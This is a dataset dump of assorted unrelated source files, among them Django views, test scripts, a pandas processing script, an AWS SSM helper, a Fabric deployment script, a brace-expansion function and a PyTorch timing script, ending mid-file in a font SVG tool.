\t\t\t'created_by',\r\n\t\t\t\t\t't_bar',\r\n\t\t\t\t\t'customer',\r\n\t\t\t\t\t'rma_number',\r\n\t\t\t\t\t'customer_meter_identifier',\r\n\t\t\t\t\t'sensus_identifier',\r\n\t\t\t\t\t'cem',\r\n\t\t\t\t\t'date_mfg',\r\n\t\t\t\t\t'meter_type',\r\n\t\t\t\t\t'meter_form',\r\n\t\t\t\t\t'customer_complaint',\r\n\t\t\t\t\t'customer_problem_description',\r\n\t\t\t\t\t'two_si',\r\n\t\t\t\t\t'display_test',\r\n\t\t\t\t\t'accuracy_test',\r\n\t\t\t\t\t'buddy_box_com_test',\r\n\t\t\t\t\t'kwh_reading',\r\n\t\t\t\t\t'meter_firmware_ver',\r\n\t\t\t\t\t'flexnet_firmware_ver',\r\n\t\t\t\t\t'fl',\r\n\t\t\t\t\t'll',\r\n\t\t\t\t\t'pf',\r\n\t\t\t\t\t'll_a',\r\n\t\t\t\t\t'll_c',\r\n\t\t\t\t\t'a',\r\n\t\t\t\t\t'c',\r\n\t\t\t\t\t'lla_12s',\r\n\t\t\t\t\t'llc_12s',\r\n\t\t\t\t\t'pfa_12s',\r\n\t\t\t\t\t'pfc_12s',\r\n\t\t\t\t\t'date_rma_opened',\r\n\t\t\t\t\t'meters_received_in_sensus',\r\n\t\t\t\t\t'column1',\r\n\t\t\t\t\t'failure_cause',\r\n\t\t\t\t\t'failure_mechanism',\r\n\t\t\t\t\t'root_cause',\r\n\t\t\t\t\t'column2',\r\n\t\t\t\t\t'reference_designator',\r\n\t\t\t\t\t'component_markings',\r\n\t\t\t\t\t'r11',\r\n\t\t\t\t\t'testing_tech',\r\n\t\t\t\t\t'disposition',\r\n\r\n\t\t\t\t\t)\r\n","sub_path":"sensei_web/fa_tracking/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
+{"seq_id":"644719034","text":"import urllib\nimport os\n\ndef save_img(img_url,file_name,file_path='picture'):\n    'Save the image to folder file_path on disk; defaults to the picture folder under the current script directory'\n    try:\n        if not os.path.exists(file_path):\n            print('folder',file_path,'does not exist, creating it')\n            #os.mkdir(file_path)\n            os.makedirs(file_path)\n        #get the image file extension\n        file_suffix = os.path.splitext(img_url)[1]\n        #build the image file name (including the path)\n        filename = '{}{}{}{}'.format(file_path,os.sep,file_name,file_suffix)\n        #download the image and save it into the folder\n        urllib.request.urlretrieve(img_url,filename=filename)\n    except IOError as e:\n        print('file operation failed',e)\n    except Exception as e:\n        print('error :',e)","sub_path":"savePicture.py","file_name":"savePicture.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
+{"seq_id":"601013549","text":"import allure\nfrom allure_commons.types import AttachmentType\nfrom Pages.Accept_vacancy import AcceptVacancy, LoginPage\n\n\nclass TestVacansyOk(AcceptVacancy):\n\n    expect = \"Вакансия была успешно одобрена\"\n\n    def test_ok_vacancy(self, adding_vacancy, get_vacancy_id, find_element_by_xpath, send_text, browser):\n        self.login_page = LoginPage()\n        self.acc_vacancy = AcceptVacancy()\n        adding_vacancy()\n        get_vacancy_id()\n        vacancy_id = get_vacancy_id()\n        self.login_page.hr_out(browser)\n        self.login_page.admin_auth(browser)\n        self.acc_vacancy.all_vacancy(find_element_by_xpath)\n        self.acc_vacancy.take_last_vacancy(find_element_by_xpath, vacancy_id, browser)\n        with allure.step('Taking a screenshot'):\n            allure.attach(browser.get_screenshot_as_png(), name='screenshot', attachment_type=AttachmentType.PNG)\n        assert self.expect in browser.page_source\n","sub_path":"tests/hr/test_ok_vacancy.py","file_name":"test_ok_vacancy.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
+{"seq_id":"463302689","text":"# Runs in about 4.5 seconds\r\nimport pandas as pd\r\nfrom pandas import Series, read_csv\r\nfrom datetime import timedelta\r\nimport numpy as np\r\n################################ COMMENTS ######################################\r\n# Change the output directory 'direc' to where the file downloaded in R was saved.\r\n# The output of this code must be processed in Excel with \"text to columns\" delimited by commas and imported as text ...\r\n# ... then the decimal point \".\" must be replaced by a comma \",\" ...\r\n# ... and used in the Excel file \"Tratar a expectativa do PIB para mensal.xlsx\".\r\n################################- Directory -######################################\r\n# Change the output directory 'direc' to where the file downloaded in R was saved.\r\ndirec = {'pib':'D:/Eric Ott/Faculdade/TCC/Modelo_BCB_Expec/PIB.csv'}\r\n##################################################################################\r\nfor serie in direc: # for each directory\r\n\tfile1 = pd.read_csv(direc[serie]) # read the CSV file\r\n\tref = pd.DatetimeIndex(file1['reference_quarter']) # For the reference quarter ...\r\n\tref_quarter = ref.month # ... store the quarter and the year in ref_quarter and ref_year.\r\n\tref_year = ref.year #\r\n\tdata = pd.DatetimeIndex(file1['date']) # For the date the projection was made ...\r\n\tproj_day = data.day # ... store the day, month and year in proj_day, proj_month and proj_year.\r\n\tproj_month = data.month #\r\n\tproj_year = data.year #\r\n\t# The formula below is the one from Appendix A.\r\n\tquarters_ahead = (ref_year - proj_year)*4 + ref_quarter - (proj_month/3).astype(int) # computes how many quarters ahead the projections were made\r\n\tquarters_ahead.index = data # index the series created above by the date the projection was made.\r\n\tsdi = pd.Series(file1['mean']) # take the mean of the projected variable of interest and build a series for it. Could also be the median 'median'.\r\n\tsdi.index = data # index the series created above by the date the projection was made.\r\n\tindexes = pd.DataFrame(data=[proj_year, proj_month, proj_day, quarters_ahead]).T # build a transposed dataframe with the information of each projection.\r\n\tindexes.columns = (\"year\",\"month\",\"day\",\"quarters_ahead\") # name the columns\r\n\tindexes.index = data # index the dataframe created above by the date the projection was made.\r\n\tindexes = pd.MultiIndex.from_frame(indexes) # build a MultiIndex from the dataframe\r\n\tdf = pd.DataFrame(data=sdi) # build a dataframe containing only the sdi series and...\r\n\tdf.index = indexes #... index that dataframe with the MultiIndex\r\n\tdf = df.dropna() # drop the missing \"NA\" observations\r\n\tdf = pd.pivot_table(df,values=\"mean\",index=[\"year\",\"month\"],columns=[\"quarters_ahead\"],aggfunc=np.mean) # aggregate into a pivot_table by the mean of the daily means of each month\r\n\tdf = df.drop([-1,6],axis=1) # drop the reference_quarters columns for quarters that are not of interest (above 5 and below 0)\r\n\tdf = df.reset_index() # reset the index to get a cleaner dataframe\r\n\tdf = (df.fillna(method=\"ffill\") + df.fillna(method=\"bfill\"))/2 # if a missing value remains, replace it with the mean of the previous and the following values\r\n\tdf.index = (df['year']/10).astype('str').str.replace('.','')+pd.Series(np.array([\"m\"]*len(df.index)))+(df['month']/10).astype('str').str.replace('.','') # strip the '.0' that was created\r\n\tdf = df.drop(['year','month'], axis=1)\r\n\tdf.columns = pd.Index([\"pib_q0\",\"pib_q1\",\"pib_q2\",\"pib_q3\",\"pib_q4\",\"pib_q5\"],name='data')\r\n\tprint(df)\r\n\tdirec_out = direc[serie][:-4] + '_treated.csv' # rename the output file\r\n\tdf.to_csv(direc_out)\r\n\tprint('CSV file created at:', direc_out)","sub_path":"Tratar_Expectativas_PIB.py","file_name":"Tratar_Expectativas_PIB.py","file_ext":"py","file_size_in_byte":3594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
+{"seq_id":"121869946","text":"from django.urls import path\r\nfrom . import views\r\n\r\nurlpatterns = [\r\n    path('', views.post_list, name='post_list'),\r\n    \r\n    path(\"photogallary/\",views.photogallary,name='photogallary'),\r\n    path(\"downloadimage\",views.export,name='export'),\r\n    path('comment/<int:pk>/remove/', views.comment_remove, name='comment_remove'),\r\n    path('photogallary/<int:pk>/remove/', views.photogallary_after_remove, name='photogallary_after_remove'),\r\n    \r\n]","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
+{"seq_id":"423130178","text":"import itertools\n\n\ndef is_movable(cur_x, cur_y, next_x, next_y, rectangles):\n    x, y = (cur_x + next_x) / 2, (cur_y + next_y) / 2\n    is_on_any_border = any(\n        (x in (x1, x2) and y1 <= y <= y2) or (y in (y1, y2) and x1 <= x <= x2)\n        for x1, y1, x2, y2 in rectangles)\n    is_inside_any_rect = any(\n        x1 < x < x2 and y1 < y < y2 for x1, y1, x2, y2 in rectangles)\n    return is_on_any_border and not is_inside_any_rect\n\n\ndef solution(rectangle, characterX, characterY, itemX, itemY):\n    cur_pos = (characterX, characterY)\n    prev_pos = None\n    for dist in itertools.count():\n        if cur_pos == (characterX, characterY) and prev_pos:  # completed a full lap around the border => break\n            perimeter = dist\n            break\n        elif cur_pos == (itemX, itemY):\n            dist_to_item = dist\n        for dx, dy in ((1, 0), (-1, 0), (0, 1), (0, -1)):\n            next_pos = (cur_pos[0] + dx, cur_pos[1] + dy)\n            if next_pos != prev_pos and is_movable(*cur_pos, *next_pos,\n                                                   rectangle):\n                prev_pos, cur_pos = cur_pos, next_pos\n                break\n    return min(dist_to_item, perimeter - dist_to_item)\n\n\nif __name__ == '__main__':\n    print(solution([[1, 1, 7, 4], [3, 2, 5, 5], [4, 3, 6, 9], [2, 6, 8, 8]], 1, 3, 7, 8))\n","sub_path":"프로그래머스연습문제/아이템 줍기.py","file_name":"아이템 줍기.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
+{"seq_id":"66490689","text":"from __future__ import annotations\n\nfrom typing import Any, Dict, List, Optional, Union\n\nimport anytree\nfrom 
mypy_boto3_ssm import Client\n\n\n__version__ = \"2021.2.1\"\n# TODO: 2021-02-09\n# - refresh all\n# - refresh at path or leaf\n# - auto-fetch from Secrets Manager if leaf.value is an ARN\n\n\ndef get_nested_dict(*, client: Client, path: str, strip_root: bool = True) -> Dict[str, Any]:\n paginator = client.get_paginator(\"get_parameters_by_path\")\n page_iterator = paginator.paginate(Path=path, Recursive=True, WithDecryption=True)\n config = {}\n if strip_root:\n root = len(path) + 1 # Remove root path and leading slash.\n else:\n root = 1 # Remove just the leading slash.\n for page in page_iterator:\n for parameter in page[\"Parameters\"]:\n path = parameter[\"Name\"][root:].split(\"/\")\n base = config\n for part in path[:-1]:\n if part not in base:\n base[part] = {}\n base = base[part]\n base[path[-1]] = parameter[\"Value\"]\n return config\n\n\nclass ConfigNode(anytree.NodeMixin):\n def __init__(\n self,\n name: str,\n value: Optional[str] = None,\n meta: Optional[Dict[str, Any]] = None,\n parent: ConfigNode = None,\n children: List[ConfigNode] = None,\n client: Client = None,\n ):\n super().__init__()\n self.name = name\n self.value = value\n if meta is None:\n meta = {}\n self.meta = meta\n self.parent = parent\n self.client = client\n if children: # set children only if given\n self.children = children\n\n def __repr__(self) -> str:\n if self.is_root:\n rep = f\"{self.__class__.__module__}.ConfigRoot({self.name})\"\n elif self.is_leaf:\n rep = f\"{self.__class__.__module__}.ConfigValue({self.name})\"\n else:\n rep = f\"{self.__class__.__module__}.ConfigPath({self.name})\"\n return rep\n\n def __str__(self) -> str:\n if self.value is not None:\n return self.value\n else:\n return self.__repr__()\n\n def __getitem__(self, name: str) -> ConfigNode:\n resolver = anytree.Resolver(\"name\")\n try:\n return resolver.get(self, name)\n except anytree.ChildResolverError:\n raise KeyError(name)\n\n def __contains__(self, item: Union[str, ConfigNode]) -> bool:\n resolver = anytree.Resolver(\"name\")\n if isinstance(item, self.__class__):\n return item.parent == self\n try:\n resolver.get(self, item)\n return True\n except anytree.ChildResolverError:\n return False\n\n @property\n def full_path(self) -> str:\n return \"/\".join([p.name for p in self.path])\n\n @classmethod\n def create_node_from_parameter(\n cls, *, client: Client, name: str, parameter: Dict[str, Any], parent: Optional[ConfigNode] = None\n ) -> ConfigNode:\n meta = {\n \"type\": parameter[\"Type\"],\n \"arn\": parameter[\"ARN\"],\n \"version\": parameter[\"Version\"],\n \"last_modified_date\": parameter[\"LastModifiedDate\"],\n \"data_type\": parameter[\"DataType\"],\n }\n return cls(name=name, value=parameter[\"Value\"], meta=meta, client=client, parent=parent)\n\n @classmethod\n def create_tree_from_path(cls, *, client: Client, path: str) -> ConfigNode:\n paginator = client.get_paginator(\"get_parameters_by_path\")\n page_iterator = paginator.paginate(Path=path, Recursive=True, WithDecryption=True)\n root = None\n base = None\n for page in page_iterator:\n for parameter in page[\"Parameters\"]:\n path = parameter[\"Name\"].strip(\"/\").split(\"/\")\n # The value of the parameter is only at the leaf node of the full\n # path. 
We first need to check that all the intermediate paths\n                # exist and create them if they don't.\n                for part in path[:-1]:\n                    if base is None:\n                        root = cls(name=part, client=client)\n                        base = root\n                    else:\n                        if part == base.name:\n                            continue\n                        elif part not in base:\n                            base = cls(name=part, client=client, parent=base)\n                        else:\n                            base = base[part]\n                # Now we can create the value at the last leaf of the path.\n                cls.create_node_from_parameter(client=client, name=path[-1], parameter=parameter, parent=base)\n                base = root\n        return root\n","sub_path":"src/ssm_params/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
+{"seq_id":"291366433","text":"from tool.get_token import *\n\n\nclass MyTestCase(unittest.TestCase):\n    \"\"\"Save the game state\"\"\"\n\n    def setUp(self):\n        self.url = url + \"/play/save-game-states\"\n\n    def test_1(self):\n        datas['gameId'] = get_gameId()\n        datas['state'] = '{\"type\": \"book-save-state-non-chapter\",' \\\n                         ' \"savedEntityId\":\"1536817660145\",' \\\n                         '\"timestamp\":1542953873000,' \\\n                         '\"currentChapterNumber\":1,' \\\n                         '\"isPinned\":true,' \\\n                         '\"purchasedPremiumOptions\":[],' \\\n                         '\"chapterCompletionCounts\":{\"1536817712210\":8}}'\n        res = requests.post(url=self.url, data=datas)\n        print(res.text)\n        self.assertTrue(u\"操作成功\" in res.text)\n\n    def tearDown(self):\n        time.sleep(1)\n\n\nif __name__ == '__main__':\n    unittest.main()\n","sub_path":"test_case/test_play8.py","file_name":"test_play8.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
+{"seq_id":"235301286","text":"from os import urandom\nfrom fabric.api import cd, env, put, run, sudo, task, local\n\nproject_name = '{{ cookiecutter.repo_name }}'\nenv.hosts = ['root@{{ cookiecutter.repo_name }}.se']\n\nvenv = 'source /var/www/venv/site/bin/activate'\nsite_root = '/var/www/%s/' % project_name\ngit_repo = '{{ cookiecutter.repo_name }}'\ndb_password = urandom(16).encode('hex')\nsecret_key = urandom(32).encode('hex')\n\n@task\ndef setup():\n    \"\"\"\n    Setup a fresh virtualenv as well as a few useful directories, then run\n    a full deployment\n    \"\"\"\n\n    sudo('yes | apt-get install postgresql postgresql-server-dev-9.1')\n\n    sudo('psql -c \"CREATE USER django WITH NOCREATEDB NOCREATEUSER ENCRYPTED PASSWORD E\\'%s\\'\"' % db_password, user='postgres')\n    sudo('psql -c \"CREATE DATABASE %s WITH OWNER django\"' % project_name, user='postgres')\n    \n    sudo('yes | apt-get install python-setuptools libpython-dev python-dev git')\n    sudo('easy_install pip')\n    sudo('pip install virtualenv')\n    sudo('yes | apt-get install nginx')\n    sudo('yes | apt-get install uwsgi uwsgi-plugin-python')\n    sudo('yes | apt-get install libjpeg-dev libfreetype6 libfreetype6-dev zlib1g-dev')\n\n    sudo('mkdir /var/www')\n    sudo('chown -R root /var/www/')\n    run('mkdir /var/www/venv')\n    run('cd /var/www/venv; virtualenv site')\n\n    sudo('echo \"export DATABASE_URL=postgres://django:%s@localhost:5432/%s\" >> /var/www/venv/site/bin/activate' % (db_password, project_name))\n    sudo('echo \"export SECRET_KEY=\\'%s\\'\" >> /var/www/venv/site/bin/activate' % secret_key)\n    sudo('echo \"export DJANGO_SETTINGS_MODULE=%s.settings.production\" >> /var/www/venv/site/bin/activate' % project_name)\n    run('cd /var/www; git clone %s' % git_repo)\n    \n    put('config/nginx/%s' % project_name, '/etc/nginx/sites-available/%s' % project_name, use_sudo=True)\n    sudo('ln -s 
/etc/nginx/sites-available/%s /etc/nginx/sites-enabled/%s' % (project_name, project_name))\n sudo('rm /etc/nginx/sites-enabled/default')\n\n put('config/uwsgi/%s.ini' % project_name, '/etc/uwsgi/apps-available/%s.ini' % project_name, use_sudo=True)\n sudo('echo \"\\nenv = DATABASE_URL=postgres://django:%s@localhost:5432/%s\" >> /etc/uwsgi/apps-available/%s.ini' % (db_password, project_name, project_name))\n sudo('echo \"env = SECRET_KEY=\\'%s\\'\" >> /etc/uwsgi/apps-available/%s.ini' % (secret_key, project_name))\n sudo('ln -s /etc/uwsgi/apps-available/%s.ini /etc/uwsgi/apps-enabled' % project_name)\n\n sudo('chown -R www-data /var/www/')\n\n deploy_migrate_and_static()\n\n@task(alias=\"d\")\ndef basic_deploy():\n with cd(site_root):\n _get_code()\n _install_deps()\n _reload()\n\n@task(alias=\"dm\")\ndef deploy():\n with cd(site_root):\n _get_code()\n _install_deps()\n _migrate()\n _reload()\n\n@task(alias=\"dms\")\ndef deploy_migrate_and_static():\n with cd(site_root):\n _get_code()\n _install_deps()\n _migrate()\n _collectstatic()\n _reload()\n\n@task(alias=\"ds\")\ndef deploy_static():\n with cd(site_root):\n _get_code()\n _install_deps()\n _collectstatic()\n _reload()\n\n@task(alias=\"r\")\ndef reload():\n with cd(site_root):\n _reload()\n\ndef _install_deps():\n sudo(\"%s && pip install -r requirements.txt\" % venv)\n\n\ndef _migrate():\n run(\"%s && python manage.py syncdb\" % venv)\n run(\"%s && python manage.py migrate\" % venv)\n\n\ndef _collectstatic():\n run(\"%s && python manage.py collectstatic -v0 --noinput\" % venv)\n\n\ndef _get_code():\n run(\"git pull origin master\")\n\n\ndef _reload():\n run(\"touch reload\")\n\n@task(alias='mpl')\ndef mirror_production_to_local():\n sudo('pg_dump %s -f /tmp/database.txt' % project_name, user='postgres')\n local('scp %s:/tmp/database.txt /tmp' % env.hosts[0])\n local('sudo su postgres -c \\\"dropdb %s\\\"' % project_name)\n local('sudo su postgres -c \\\"createdb %s\\\"' % project_name)\n local('sudo su postgres -c \\\"psql -d %s -f /tmp/database.txt\\\"' % project_name)\n local('scp -r %s:%s%s/media/uploads/ ./%s/media/' % (env.hosts[0], site_root, project_name, project_name))","sub_path":"{{cookiecutter.repo_name}}/fabfile.py","file_name":"fabfile.py","file_ext":"py","file_size_in_byte":4072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"445281730","text":"\"\"\"\n# echo\n# 1. echo(\"a,b\") => [\"a\", \"b\"]\n# 2. echo(\"a{b,c}\") => [\"ab\", \"ac\"]\n# 3. echo(\"a{b,c{d,e}f}\") => [\"ab\", \"acdf\", \"acef\"]\n# 4. echo(\"a{b,c}{d,f}\") => [\"abd\", \"abf\", \"acd\", \"acf\"]\n# Lessons learnt - First properly understand the question. 
Then calmly think about questions from 1st principles and then solve them.\n\"\"\"\n\n\ndef split_by_bracket(input_str):\n    split_parts = []\n    bracket_count = 0\n    cur_idx = 0\n    prev_idx = 0\n    for c in input_str:\n        if c == '{':\n            bracket_count += 1\n            if bracket_count == 1:\n                split_parts.append(input_str[prev_idx:cur_idx])\n                prev_idx = cur_idx + 1\n        elif c == '}':\n            bracket_count -= 1\n            if bracket_count == 0:\n                split_parts.append(input_str[prev_idx:cur_idx])\n                prev_idx = cur_idx + 1\n        cur_idx += 1\n\n    split_parts.append(input_str[prev_idx:cur_idx])\n    return split_parts\n\n\ndef split_by_comma(input_str):\n    split_parts = []\n    bracket_count = 0\n    cur_idx = 0\n    prev_idx = 0\n    for c in input_str:\n        if c == '{':\n            bracket_count += 1\n        elif c == '}':\n            bracket_count -= 1\n\n        if bracket_count == 0:\n            if c == ',':\n                split_parts.append(input_str[prev_idx:cur_idx])\n                prev_idx = cur_idx + 1\n        cur_idx += 1\n\n    split_parts.append(input_str[prev_idx:cur_idx])\n\n    return split_parts\n\n\ndef echo(input_str):\n    parts = split_by_comma(input_str)\n    if len(parts) > 1:\n        echo_out = []\n        for part in parts:\n            part_echo_out = echo(part)\n            echo_out.extend(part_echo_out)\n        return echo_out\n\n    parts = split_by_bracket(input_str)\n    if len(parts) == 1:\n        return [input_str]\n    else:\n        i = 0\n        echo_out = ['']\n        for part in parts:\n            if i % 2 == 0:\n                echo_out = [s + part for s in echo_out]  # renamed to avoid shadowing built-in str\n            else:\n                bracket_out = echo(part)\n                new_echo_out = []\n                for echo_str in echo_out:\n                    for bracket_str in bracket_out:\n                        new_echo_out.append(echo_str + bracket_str)\n\n                echo_out = new_echo_out\n            i += 1\n        return echo_out\n\n\nif __name__ == '__main__':\n    a = \"a,b\"\n    b = \"a{b,c}\"\n    c = \"a{b,c{d,e}f}\"\n    d = \"a{b,c}{d,f}\"\n    e = \"a,b{cd,e{1,2,3}f{4,5}}g,h,i{j,k}\"\n\n    print(echo(a))\n    print(echo(b))\n    print(echo(c))\n    print(echo(d))\n    print(echo(e))\n","sub_path":"RubkRecursiveEcho.py","file_name":"RubkRecursiveEcho.py","file_ext":"py","file_size_in_byte":2512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"16598387","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport logbook\n\n''' You can override the LOG level from your environment.\n    For example, if you want to see the DEBUG messages, run:\n    $ export CATALYST_LOG_LEVEL=10\n'''\nLOG_LEVEL = int(os.environ.get('CATALYST_LOG_LEVEL', logbook.INFO))\n\nSYMBOLS_URL = 'https://s3.amazonaws.com/enigmaco/catalyst-exchanges/' \\\n              '{exchange}/symbols.json'\n\nDATE_TIME_FORMAT = '%Y-%m-%d %H:%M'\nDATE_FORMAT = '%Y-%m-%d'\n\nAUTO_INGEST = False\n","sub_path":"catalyst/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"214121511","text":"from django.shortcuts import render, get_object_or_404, redirect\nfrom django.contrib.sites.shortcuts import get_current_site\nfrom django.http import Http404, HttpResponse\nfrom main.models import Project, customUser\nfrom django.contrib import messages\nfrom .forms import ProjectForm\nfrom django.utils.encoding import force_bytes, force_text\nimport datetime\nfrom main.tokens import account_activation_token\nfrom django.core.paginator import Paginator\nfrom django.utils.http import urlsafe_base64_encode, urlsafe_base64_decode\n\ndef add_edit_project(request, project_id=None):\n    if project_id is None:\n        edit_action = False\n        form = ProjectForm()\n    else:\n        edit_action = True\n        editing_project = get_object_or_404(Project, projectID=project_id)\n        if editing_project.industryOwn == 
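The even/odd accumulation loop in echo() above is a cross product between literal segments and expanded bracket groups. A standalone sketch of that one step using itertools.product (illustration only, not the file's code):

from itertools import product

def cross(parts_options):
    # One inner list per segment, e.g. [['a'], ['b', 'c'], ['d', 'f']].
    return [''.join(combo) for combo in product(*parts_options)]

print(cross([['a'], ['b', 'c'], ['d', 'f']]))  # ['abd', 'abf', 'acd', 'acf']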
request.user:\n form = ProjectForm(instance=editing_project)\n else:\n raise Http404\n if request.method == 'POST':\n if 'delete' in request.POST:\n Project.objects.get(pk=project_id).delete()\n messages.success(request, \"You have successfully deleted this project.\")\n return redirect('/industry/list')\n else:\n form = ProjectForm(request.POST, request.FILES)\n if form.is_valid():\n project = form.save(commit=False)\n if edit_action:\n project.projectID = project_id\n project.industryOwn = request.user\n project.creationDate = editing_project.creationDate\n else:\n project.industryOwn = request.user\n project.creationDate = datetime.datetime.today()\n project.save()\n if edit_action:\n messages.success(request, \"You have successfully edited this project.\")\n return redirect('/industry/project/'+ str(project_id))\n else:\n messages.success(request, \"You have successfully added this project.\")\n return redirect('/industry/list')\n else:\n messages.error(request, \"Fill in all fields correctly.\")\n\n context = {'form':form, 'edit_action':edit_action}\n return render(request, 'industries/AddEditProject.html', context)\n\ndef home(request):\n try:\n user = request.user\n except:\n raise Http404\n reserved_projects = Project.objects.filter(industryOwn=request.user, status=\"Reserved\")\n exploring_projects = Project.objects.filter(industryOwn=request.user, status=\"Exploring\")\n listed_projects = Project.objects.filter(industryOwn=request.user)\n context = {'user':user, 'reserved_projects':reserved_projects, 'exploring_projects':exploring_projects, 'listed_projects':listed_projects}\n return render(request, 'industries/home.html', context)\n\ndef list_projects(request):\n allProjects = Project.objects.filter(industryOwn=request.user)\n showOpen = False\n showReserved = False\n showExploring = False\n showClosed = False\n if request.method == 'POST':\n filteredProjects = []\n if 'filter_option' in request.POST:\n filter_option = int(request.POST['filter_option'])\n if filter_option == 1:\n allProjects = allProjects.order_by('-creationDate')\n if filter_option == 2:\n allProjects = allProjects.order_by('endDate')\n for i in request.POST:\n filter = True\n if i == \"showOpen\":\n showOpen = True\n elif i == \"showReserved\":\n showReserved = True\n elif i == \"showExploring\":\n showExploring = True\n elif i == \"showClosed\":\n showClosed = True\n\n if(showOpen):\n filteredProjects += allProjects.filter(status=\"Open\")\n if(showReserved):\n filteredProjects += allProjects.filter(status=\"Reserved\")\n if(showExploring):\n filteredProjects += allProjects.filter(status=\"Exploring\")\n if(showClosed):\n filteredProjects += allProjects.filter(status=\"Closed\")\n projectList = filteredProjects\n else:\n if 'search' in request.GET:\n search_term = request.GET['search']\n allProjects = allProjects.filter(title__icontains=search_term)\n projectList = allProjects\n paginator = Paginator(projectList, 2)\n page = request.GET.get('page')\n projects = paginator.get_page(page)\n context = {\"AllProjects\":projects, \"Open\":showOpen, \"Reserved\":showReserved, \"Exploring\":showExploring, \"Closed\":showClosed, }\n return render(request, 'industries/myProjects.html', context)\n\ndef view_myproject(request, project_id):\n project = get_object_or_404(Project, projectID=project_id)\n if project.industryOwn != request.user:\n raise Http404\n if project.status == \"Reserved\":\n messages.info(request, \"This project is reserved by a lecturer.\")\n context = {\n 'project': project,\n 'domain': 
get_current_site(request).domain,\n            'uid':urlsafe_base64_encode(force_bytes(project_id)),\n            'token':account_activation_token.make_token(request.user),\n        }\n    else:\n        context = {'project':project,}\n    return render(request, 'industries/project.html', context)\n\ndef myproject_reservation(request, uid, token):\n    try:\n        uid = force_text(urlsafe_base64_decode(uid))\n        project = Project.objects.get(pk=uid)\n    except (TypeError, ValueError, OverflowError):\n        return HttpResponse('Link expired')\n    except (Project.DoesNotExist):\n        raise Http404\n    if project.industryOwn != request.user:\n        raise Http404\n    lecturer_id = project.lecturerReserve\n    lecturer_publicName = get_object_or_404(customUser, pk=lecturer_id).publicName\n    if request.method == \"POST\":\n        if 'accept' in request.POST:\n            project.status='Exploring'\n            project.save()\n            messages.success(request, \"You have just accepted the reservation.\")\n            return redirect('/industry/')\n    return render(request, 'industries/reservationView.html', {'project':project, 'lecturer_publicName': lecturer_publicName})\n\n\n# Create your views here.\n","sub_path":"django_project/industries/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"433536502","text":"import torch\nfrom timeit import timeit\nimport argparse\n\ndef time_multiplication(\n    timer_repetitions,\n    use_gpu=True,\n    data_path=\"/mnt/qb/baumgartner/storagetest.txt\",\n):\n\n    # Simulate external data access by reading the matrix size from an external file\n    with open(data_path) as f:\n        s = int(f.read())\n\n    # Create tensors\n    x = torch.randn(32, s)\n    y = torch.randn(s, 32)\n    \n    # Check if Cuda available and move tensor to Cuda if yes\n    cuda_available = torch.cuda.is_available() \n    print(f\"Cuda_available={cuda_available}\")\n    if cuda_available and use_gpu:\n        device = torch.cuda.current_device()\n        print(f\"Current Cuda device: {device}\")\n        x = x.to(device)\n        y = y.to(device)\n\n    # Multiply matrix first once for result and then multiple times for measuring elapsed time\n    mult = torch.matmul(x, y)\n    elapsed_time = timeit(lambda: torch.matmul(x, y), number=timer_repetitions)\n\n    # Print some results:\n    print(\"result:\")\n    print(mult)\n    print(\"Output shape\", mult.shape)\n    print(f\"elapsed time: {elapsed_time}\")\n\nif __name__ == \"__main__\":\n\n    parser = argparse.ArgumentParser(\n        description=\"Test script for Singularity and SLURM on GPU. 
It times the multiplication of two matrices, repeated `timer_repetition` times.\"\n    )\n    parser.add_argument(\n        \"--timer_repetitions\", dest=\"timer_repetitions\", action=\"store\", default=1000, type=int, help=\"How many times to repeat the multiplication.\",\n    )\n    parser.add_argument('--use-gpu', dest='use_gpu', action='store_true')\n    parser.add_argument('--no-gpu', dest='use_gpu', action='store_false')\n    parser.set_defaults(use_gpu=True)\n    args = parser.parse_args()\n\n    # Run main function with command line input, to test singularity arguments\n    time_multiplication(timer_repetitions=args.timer_repetitions, use_gpu=args.use_gpu)\n\n    print(\"done.\")","sub_path":"examples/05_singularity/multiply.py","file_name":"multiply.py","file_ext":"py","file_size_in_byte":1886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"303567723","text":"#!/usr/bin/env python\n\nfrom __future__ import print_function\n\n__doc__=\"\"\"\\\nAdds an SVG table to a font, using SVG files provided.\nThe font format can be either OpenType or TrueType.\n\nUsage:\n python addSVGtable.py [options] -s <folder_path> font\n\nOptions:\n -s path to folder containing SVG files.\n (the file names MUST match the names of the glyphs they're meant to be associated with.)\n -m do not make a copy of the input font.\n -k do not strip the 'viewBox' parameter.\n -w generate WOFF and WOFF2 formats.\n -x comma-separated list of glyph names to exclude.\n -z compress the SVG table.\n\"\"\"\n\n#-----------------------------------------------------------------------------------------\n\nimport os\nimport sys\nimport re\nimport getopt\nfrom shutil import copy2\n\nfontToolsURL = 'https://github.com/fonttools/fonttools'\n\ntry:\n\tfrom fontTools import ttLib\n\tfrom fontTools import version as ftversion\nexcept ImportError:\n\tprint(\"ERROR: FontTools Python module is not installed.\\n\\\n Get the latest version at %s\" % fontToolsURL, 